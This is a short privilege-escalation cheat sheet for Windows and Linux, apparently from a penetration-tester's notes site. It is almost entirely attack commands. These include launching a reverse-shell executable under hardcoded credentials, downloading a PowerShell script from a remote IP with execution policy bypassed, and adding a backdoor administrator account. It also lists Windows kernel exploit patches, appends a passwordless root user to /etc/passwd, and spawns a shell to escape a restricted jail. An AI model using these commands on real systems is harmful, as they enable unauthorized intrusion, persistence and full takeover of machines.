Privilege Escalation
Windows
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
net user
Change User
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice",
$secpasswd)
$computer = "BETHANY"
[System.Diagnostics.Process]::Start("C:\Windows\temp\reverse.exe","<argument>",
$mycreds.Username, $mycreds.Password, $computer)
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.98/run.ps1','C:\Users\Bethany\run.ps1')"
net user <username> <password> /add
net localgroup Administrators <username> /add
start RDP
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic os get osarchitecture
KiTrap0D (KB979682)
MS11-011 (KB2393802)
MS10-059 (KB982799)
MS10-021 (KB979683)
MS11-080 (KB2592799)
Kernel

Linux
Writable /etc/passwd
echo 'dummy::0:0::/root:/bin/bash' >> /etc/passwd
Linux Kernel 2.6 UDEV
Break out from jail shell
python -c 'import pty; pty.spawn("/bin/bash")'
References
Linux
Windows
Popular Linux Kernel Exploit
Popular Windows Kernel Exploit
Kitrap0D
Last updated
Was this helpful?